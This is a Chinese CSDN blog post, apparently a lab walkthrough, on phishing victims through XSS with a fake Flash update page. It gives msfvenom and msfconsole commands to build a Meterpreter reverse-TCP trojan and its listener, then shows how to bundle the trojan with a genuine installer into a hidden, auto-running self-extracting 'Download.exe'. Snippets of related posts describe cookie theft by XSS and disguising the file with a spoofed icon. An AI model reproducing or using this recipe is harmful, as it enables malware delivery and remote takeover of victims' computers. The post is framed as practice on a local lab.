XSS-Flash攻击钓⻥

最新推荐文章于 2024-07-24 10:40:52 发布
最新推荐文章于 2024-07-24 10:40:52 发布
阅读量239 收藏 4
点赞数 11
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85783544/article/details/140638587
版权

钓鱼前先了解一下什么叫Flash攻击钓鱼

一、在本机phpstudy中开启服务

二、在https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash中下载其源码文件并部署在网站根目录下。

二、来到xss平台 点击公共模块---flash弹窗钓⻥-查看, 将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。

三、修改我们创建的1.js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址

四、进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe ⽣成⼀个shell.exe⽊马拖到本机上

开启监听

msfconsole use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.1.7
set lport 4444
run

六、将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp,点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

七、在kali模拟受害者的流程 最终获取到受害者⽹站控制权

詹姆诗
关注
  • 11
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS-Flash攻击
ineedmoreMuQ的博客
07-23 611
XSS-Flash攻击
记录 XSS-Flash攻击
starhei.zxy的博客
07-23 732
10.同样的⽅法----ResourceHacker打开刚刚打包好的⽂件,点击Icon Group⽂件夹中的⽂ 件,⿏标右键替换ico图标,最后保存..7.将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填 写解压路径为 C:\Windows\Temp。8.点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!1.首先在本机phpstudy中开启web服务。
XSS-窃取Cookie和Flash攻击
weixin_53736204的博客
07-23 389
步骤⼀:在以下⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称…⽴即提交步骤⼆:在我的项⽬中选择我们刚创建的项⽬步骤三:点击右上⻆的查看配置代码步骤四:复制script这⼀条代码步骤五:打开⼀个pikachu平台 xss盲打并将我们刚才复制的script恶意代码输⼊进去步骤六:模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码用户名:admin 123456步骤七:此时回到平台上可看到其劫持的Cookie信息.点击查看 可以查看到其中的cookie字段。
xss-flash鱼配合msf捆绑上线
weixin_43225966的博客
04-21 949
xss-flash鱼配合msf捆绑上线
XSS-窃取Cookie和Flash攻击的小小一次尝试
weixin_45790890的博客
07-23 392
通过ResourceHacker打开原版的flash安 装程序,点击 Icon Group ⽂件夹中的⽂件,⿏标右键"保存*.ico资源",即可导出ico图标…步骤六:将两个⽂件⼀块压缩并更改⽂件名为"flashcenter_pp_ax_install_cn.exe",点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp。下面的操作可有可无,有了的话,你的木马程序就会神不知鬼不觉进入到受害者的电脑中。步骤四:修改js中的这⼀⾏代码,改成我们伪造的flash网站,
XSS -攻击防御手册.pdf
07-26
#### 七、进行Flash攻击 尽管HTML5已逐渐取代Flash,但在Flash仍然被广泛使用的时期,攻击者可以通过创建恶意的Flash对象来触发XSS攻击。这通常涉及到利用Flash的脚本接口,使浏览器执行不受信任的代码。 #### 八...
XSS跨站脚本攻击剖析与防御
04-28
XSS跨站脚本攻击剖析与防御是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做了...
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本gj剖析与防御.pdf
05-13
XSS跨站脚本攻击剖析与防御》,完整版本。作者:邱永华,出版社:人民邮电出版社,ISBN:9787115311047,PDF 格式,扫描版,大小 67MB。本资源带有PDF书签,方便读者朋友阅读。 内容简介: 《XSS跨站脚本攻击剖析...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 334
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
xt350488的博客
07-22 1529
xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考: https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw。
前端面试题日常练-day97 【Less】
qq_44640575的博客
07-20 466
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
TS如何处理js模块的类型?
最新发布
闻人放歌的三寸青草园圃
07-24 78
【代码】TS如何处理js模块的类型?
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 989
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
Odoo Registry 源码解读:前端世界的魔法师
清水欧度 Odoo ERP
07-23 853
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
前端小游戏,4096小游戏,有音效,Html5,可学习使用
m0_62996549的博客
07-18 608
【代码】纯前端小游戏,4096小游戏,有音效,Html5,可学习使用。
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 824
CTFWP,ctfshow-web42
vue如何解决跨域?
FENGZXCjjjjj的博客
07-21 501
在Vue.js项目中,当你的前端应用尝试从与自身不同源的服务器(协议、域名、端口中的任一不同)加载资源时,可能会遇到跨域(CORS, Cross-Origin Resource Sharing)问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值